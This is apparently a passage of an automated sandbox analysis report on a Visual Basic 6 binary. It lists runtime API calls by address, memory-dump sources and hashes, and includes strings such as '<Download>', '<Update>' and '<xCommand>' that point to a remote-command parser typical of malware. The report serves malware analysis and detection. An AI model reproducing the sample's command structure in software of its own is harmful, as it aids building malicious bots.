                                                                                                                                                            • #580.MSVBVM60(?,00000026,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A71
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A85
                                                                                                                                                            • __vbaFileOpen.MSVBVM60(00000220,000000FF,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411A93
                                                                                                                                                            • #525.MSVBVM60(00001000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AA5
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411AB0
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B09
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B16
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B26
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B33
                                                                                                                                                            • #525.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B71
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B7C
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B8C
                                                                                                                                                            • __vbaGet3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411B99
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BA9
                                                                                                                                                            • __vbaPut3.MSVBVM60(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BB6
                                                                                                                                                            • #598.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BD0
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BE5
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BEC
                                                                                                                                                            • __vbaI2I4.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411BFC
                                                                                                                                                            • __vbaFileClose.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C03
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406BF8,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C19
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C24
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C31
                                                                                                                                                            • #600.MSVBVM60(00000008,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C47
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C56
                                                                                                                                                            • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411C5F
                                                                                                                                                            • #600.MSVBVM60(00004008,00000000), ref: 00411C85
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00411CE8), ref: 00411CBD
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CC6
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CCF
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CD8
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,004025E6), ref: 00411CE1
                                                                                                                                                            • __vbaErrorOverflow.MSVBVM60 ref: 00411CFF
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$FileMove$CloseGet3$#525$CopyOpenPut3$#516#631#648BstrErrorSeek$#580#600Chkstk$#529#537#570#598ListOverflow
                                                                                                                                                            • String ID: E
                                                                                                                                                            • API String ID: 1020712489-3568589458
                                                                                                                                                            • Opcode ID: f54afba412deddb39359729a71a6808b361c1be6de5175c45cca3d60e2a50ae1
                                                                                                                                                            • Instruction ID: 2c3bdc2995cc32bb6ddafcd024d806e85dbf0c974109c8e670926915eacf5b68
                                                                                                                                                            • Opcode Fuzzy Hash: f54afba412deddb39359729a71a6808b361c1be6de5175c45cca3d60e2a50ae1
                                                                                                                                                            • Instruction Fuzzy Hash: 8322E6B1900249EBDB04DFE0DA48ADEBBB5FF48305F108129E602B76A0DB745A85DB58
                                                                                                                                                            Function 00411D10 Relevance: 143.9, APIs: 81, Strings: 1, Instructions: 403COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00000000,004025E6), ref: 00411D2E
                                                                                                                                                            • __vbaStrCopy.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D5B
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6), ref: 00411D6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411D80
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411D8B
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,00000000,?,00000000,004025E6), ref: 0040FBBE
                                                                                                                                                              • Part of subcall function 0040FBA0: __vbaOnError.MSVBVM60(000000FF,?,00000000,?,00000000,004025E6,?), ref: 0040FBEE
                                                                                                                                                              • Part of subcall function 0040FBA0: #580.MSVBVM60(00000000,00000000,00000000,?,00000000,?,00000000,004025E6,?), ref: 0040FC1A
                                                                                                                                                              • Part of subcall function 0040FBA0: #529.MSVBVM60(00004008), ref: 0040FC38
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,00000000,?,00000000,004025E6), ref: 00411D9D
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,00000000,?,00000000,004025E6), ref: 00411DB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411DBE
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60(72A47559,00000000,00000000), ref: 004156CA
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 004156D2
                                                                                                                                                              • Part of subcall function 00415660: __vbaOnError.MSVBVM60(00000001), ref: 004156D6
                                                                                                                                                              • Part of subcall function 00415660: #648.MSVBVM60(0000000A), ref: 004156EE
                                                                                                                                                              • Part of subcall function 00415660: __vbaFreeVar.MSVBVM60 ref: 004156FD
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60(?), ref: 0041570F
                                                                                                                                                              • Part of subcall function 00415660: __vbaFileOpen.MSVBVM60(00000120,000000FF,00000000), ref: 00415719
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415721
                                                                                                                                                              • Part of subcall function 00415660: #570.MSVBVM60(00000000), ref: 00415724
                                                                                                                                                              • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415734
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrCopy.MSVBVM60 ref: 00415753
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrMove.MSVBVM60(?), ref: 00415769
                                                                                                                                                              • Part of subcall function 00415660: __vbaFreeStr.MSVBVM60 ref: 0041576E
                                                                                                                                                              • Part of subcall function 00415660: __vbaLenBstr.MSVBVM60(00404B24), ref: 00415782
                                                                                                                                                              • Part of subcall function 00415660: #525.MSVBVM60(00000000), ref: 00415789
                                                                                                                                                              • Part of subcall function 00415660: __vbaStrMove.MSVBVM60 ref: 00415794
                                                                                                                                                              • Part of subcall function 00415660: __vbaI2I4.MSVBVM60 ref: 00415799
                                                                                                                                                              • Part of subcall function 00415660: __vbaGet4.MSVBVM60(00000000,?,-00000001,00000000), ref: 004157A3
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,?,00000000,004025E6), ref: 00411DDF
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,00000006,00000006,?,00000000,?,00000000,004025E6), ref: 00411E04
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E0F
                                                                                                                                                            • #580.MSVBVM60(00000000,?,00000000,?,00000000,004025E6), ref: 00411E16
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E1F
                                                                                                                                                            • #598.MSVBVM60(?,00000000,?,00000000,004025E6), ref: 00411E2C
                                                                                                                                                            • __vbaNew2.MSVBVM60(004043C4,0041B024,0041B09C,?,00000000,?,00000000,004025E6), ref: 00411E5D
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411E97
                                                                                                                                                            • __vbaObjSet.MSVBVM60(?,?), ref: 00411EB8
                                                                                                                                                            • __vbaFreeObjList.MSVBVM60(00000002,?,00000000,0041B09C,?,?,00000020), ref: 00411EDE
                                                                                                                                                            • #598.MSVBVM60(?,00000000,004025E6), ref: 00411EEE
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60(?,00000000,004025E6), ref: 00411F10
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?,?,?,00000000,004025E6), ref: 00411F2C
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,00000000,004025E6), ref: 00411F37
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(00000000,?,00000000,004025E6), ref: 00411F46
                                                                                                                                                            • #598.MSVBVM60(?,00000000,004025E6), ref: 00411F53
                                                                                                                                                            • #648.MSVBVM60(0000000A), ref: 00411F72
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00411F81
                                                                                                                                                            • __vbaStrCat.MSVBVM60(00406C74,?), ref: 00411F97
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(004123A7), ref: 00412397
                                                                                                                                                            • __vbaFreeStr.MSVBVM60 ref: 004123A0
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Free$Move$CopyError$#598$#580#648BstrChkstk$#525#529#570FileGet4ListNew2OpenSystem
                                                                                                                                                            • String ID: 5
                                                                                                                                                            • API String ID: 3012955283-2226203566
                                                                                                                                                            • Opcode ID: 0b24e6c4bda827c6a114c5c5ec940fd24b323a20a7d7f84330a0b150b4d800ed
                                                                                                                                                            • Instruction ID: b2978daf75234b14887ffa37483130b8305288e28cd3c1483e6757a63013c22d
                                                                                                                                                            • Opcode Fuzzy Hash: 0b24e6c4bda827c6a114c5c5ec940fd24b323a20a7d7f84330a0b150b4d800ed
                                                                                                                                                            • Instruction Fuzzy Hash: 9302E771900248EFDB04DFE0DE58BDEBBB5FB48305F108169E606B76A0DB781A85DB58
                                                                                                                                                            Function 0040F1D0 Relevance: 133.5, APIs: 66, Strings: 10, Instructions: 460COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,0040AA6C,0041B090), ref: 0040F1EE
                                                                                                                                                            • __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 0040F21E
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaChkstk.MSVBVM60(0040AA6C,004025E6,0040AA6C,?,?,?,00000000,004025E6), ref: 0040FA6E
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaOnError.MSVBVM60(000000FF,?,?,?,0040AA6C,004025E6,0040AA6C), ref: 0040FA9E
                                                                                                                                                              • Part of subcall function 0040FA50: #648.MSVBVM60(0000000A), ref: 0040FABD
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFreeVar.MSVBVM60 ref: 0040FACA
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFileOpen.MSVBVM60(00000120,000000FF,?), ref: 0040FAE9
                                                                                                                                                              • Part of subcall function 0040FA50: #570.MSVBVM60(?), ref: 0040FAFB
                                                                                                                                                              • Part of subcall function 0040FA50: #525.MSVBVM60(00000000), ref: 0040FB02
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaStrMove.MSVBVM60 ref: 0040FB0D
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaGet3.MSVBVM60(00000000,?,?), ref: 0040FB25
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFileClose.MSVBVM60(?), ref: 0040FB37
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaStrCopy.MSVBVM60 ref: 0040FB4A
                                                                                                                                                              • Part of subcall function 0040FA50: __vbaFreeStr.MSVBVM60(0040FB7E), ref: 0040FB77
                                                                                                                                                            • __vbaStrMove.MSVBVM60(0040AA6C,?,?,?,00000000,004025E6), ref: 0040F239
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaLenBstr.MSVBVM60(00000000), ref: 0040EEAD
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,?), ref: 0040EEF8
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,?), ref: 0040EF03
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,?), ref: 0040EF0A
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeStr.MSVBVM60(?,?,?), ref: 0040EF68
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaFreeVar.MSVBVM60(?,?,?), ref: 0040EF71
                                                                                                                                                              • Part of subcall function 0040EE70: #631.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFA1
                                                                                                                                                              • Part of subcall function 0040EE70: __vbaStrMove.MSVBVM60(?,?,00000002,?,?,?), ref: 0040EFAC
                                                                                                                                                              • Part of subcall function 0040EE70: #516.MSVBVM60(00000000,?,?,00000002,?,?,?), ref: 0040EFB3
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F24D
                                                                                                                                                            • __vbaFreeStr.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F256
                                                                                                                                                            • __vbaLenBstr.MSVBVM60(?,?,?,?,00000000,004025E6), ref: 0040F267
                                                                                                                                                            • #712.MSVBVM60(00000000,0040728C,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F291
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F29C
                                                                                                                                                            • #712.MSVBVM60(00000000,00407294,00406674,00000001,000000FF,00000000,?,?,?,00000000,004025E6), ref: 0040F2BD
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?,?,?,00000000,004025E6), ref: 0040F2C8
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2E2
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001,?,?,?,00000000,004025E6), ref: 0040F2FF
                                                                                                                                                            • #712.MSVBVM60(00000000,004072A0,004072B8,00000001,000000FF,00000000), ref: 0040F33A
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040F345
                                                                                                                                                            • #712.MSVBVM60(00000000,004072AC,004072C0,00000001,000000FF,00000000), ref: 0040F366
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040F371
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072A0,00000001,00000001), ref: 0040F38B
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,004072AC,00000001,00000001), ref: 0040F3A8
                                                                                                                                                            • __vbaInStr.MSVBVM60(00000000,<xCommand,00000001,00000001), ref: 0040F3CA
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000008.00000002.1815867409.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                            • Associated: 00000008.00000002.1815750797.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            • Associated: 00000008.00000002.1816696696.000000000041D000.00000080.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_8_2_400000_explorer.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __vba$Move$Free$#712$#516#631BstrChkstkErrorFile$#525#570#648CloseCopyGet3Open
                                                                                                                                                            • String ID: 8$</Download>$</Update>$</xCommand>$<Download>$<Update>$<xCommand$Param$URL$Version
                                                                                                                                                            • API String ID: 3601514899-954089795
                                                                                                                                                            • Opcode ID: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                            • Instruction ID: 2d68e6c41ca87c00c381124143961c125374000113fd64c2ef600be50ae681ef
                                                                                                                                                            • Opcode Fuzzy Hash: 691ee2edf4af6776942d29cbf2e5881f73f70abf8b28773798784accf01272c1
                                                                                                                                                            • Instruction Fuzzy Hash: 0012ED71900208EFDB14DFE0DE49BDDBBB5BB48305F208179E502BB2A4DB795A49CB58
                                                                                                                                                            Function 00408D7C Relevance: 129.9, APIs: 73, Strings: 1, Instructions: 397COMMON
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            APIs
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C), ref: 00408DB5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DC0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408DCE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DD9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408DE5
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408DF0
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408DFD
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E08
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408E16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E2D
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E38
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408E46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408E5E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E69
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408E75
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408E80
                                                                                                                                                              • Part of subcall function 00410180: __vbaChkstk.MSVBVM60(00000000,004025E6,?,?,?,?,00409D5A,00000000), ref: 0041019E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCopy.MSVBVM60(?,?,?,00000000,004025E6), ref: 004101CE
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryConstruct2.MSVBVM60(?,004068A0,00000003,?,?,?,00000000,004025E6), ref: 004101DF
                                                                                                                                                              • Part of subcall function 00410180: __vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,004025E6), ref: 004101EE
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(0000000F,00000000,?,?,?,00000000,004025E6), ref: 0041020A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128), ref: 00410244
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000), ref: 0041025A
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?), ref: 00410273
                                                                                                                                                              • Part of subcall function 00410180: #525.MSVBVM60(00000104), ref: 0041029C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60 ref: 004102A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(00000410,00000000,?), ref: 004102DE
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToAnsi.MSVBVM60(?,?,000001F4), ref: 00410338
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408EB2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C), ref: 00408ECE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408ED9
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408EE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408EF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408EFE
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F09
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408F16
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F21
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408F2F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F3A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F46
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F51
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408F5F
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F6A
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00408F77
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F82
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00408F8E
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408F99
                                                                                                                                                              • Part of subcall function 00410180: __vbaGenerateBoundsError.MSVBVM60 ref: 0041031D
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,?,00000000), ref: 0041035E
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrToUnicode.MSVBVM60(?,?,?,00000000), ref: 0041036F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 00410384
                                                                                                                                                              • Part of subcall function 00410180: #616.MSVBVM60(?,?,?,00000000), ref: 00410399
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 004103A7
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,?,00000000), ref: 004103BE
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(?,00000000), ref: 004103CA
                                                                                                                                                              • Part of subcall function 00410180: __vbaLenBstr.MSVBVM60(?,?,00000000), ref: 004103DB
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(?,0040614C,?,00000001,?,00000000), ref: 00410402
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 00410410
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrCat.MSVBVM60(0040614C,00000000,?,00000000), ref: 0041041C
                                                                                                                                                              • Part of subcall function 00410180: __vbaStrMove.MSVBVM60(?,00000000), ref: 0041042A
                                                                                                                                                              • Part of subcall function 00410180: __vbaInStr.MSVBVM60(00000001,00000000,?,00000000), ref: 00410433
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStrList.MSVBVM60(00000002,?,?,?,00000000), ref: 00410459
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecUniToAnsi.MSVBVM60(00404B50,?,00000128,?,00000000), ref: 0041049A
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?,00000000,?,00000000), ref: 004104B0
                                                                                                                                                              • Part of subcall function 00410180: __vbaRecAnsiToUni.MSVBVM60(00404B50,00000128,?,?,00000000), ref: 004104C9
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000009,?,?,?,?,?,?,?,?,?,00000000), ref: 00408FCB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C), ref: 00408FE7
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00408FF2
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409000
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040900B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409017
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409022
                                                                                                                                                              • Part of subcall function 00410180: __vbaSetSystemError.MSVBVM60(?), ref: 004104ED
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60(0041054B), ref: 00410517
                                                                                                                                                              • Part of subcall function 00410180: __vbaAryDestruct.MSVBVM60(00000000,?), ref: 0041052F
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410538
                                                                                                                                                              • Part of subcall function 00410180: __vbaFreeStr.MSVBVM60 ref: 00410544
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000003,?,?,?,00000000), ref: 0040903C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,0040614C), ref: 00409057
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409062
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409070
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040907B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409087
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409092
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 004090A0
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090AB
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 004090B8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090C3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 004090CF
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090DA
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 004090E8
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 004090F3
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409101
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040910C
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409118
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409123
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409130
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040913B
                                                                                                                                                            • __vbaStrCat.MSVBVM60(?,00000000), ref: 00409149
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 00409154
                                                                                                                                                            • __vbaStrCat.MSVBVM60(0040614C,00000000), ref: 00409160
                                                                                                                                                            • __vbaStrMove.MSVBVM60 ref: 0040916B
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(0000000C,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004091A9
                                                                                                                                                            • __vbaStrCmp.MSVBVM60(?,?), ref: 004091D2
                                                                                                                                                            • #580.MSVBVM60(?,00000027,?,?,0041B088,?), ref: 00409245
                                                                                                                                                            • __vbaStrCat.MSVBVM60( SE,?,?), ref: 0040925D
                                                                                                                                                            • #600.MSVBVM60(00000008,00000000), ref: 00409273
                                                                                                                                                            • __vbaFreeVar.MSVBVM60 ref: 00409282
                                                                                                                                                            • __vbaSetSystemError.MSVBVM60 ref: 004092A4
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092B9
                                                                                                                                                            • __vbaStrMove.MSVBVM60(?), ref: 004092CD
                                                                                                                                                            • __vbaStrCopy.MSVBVM60 ref: 004092DA
                                                                                                                                                            • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 004092EA
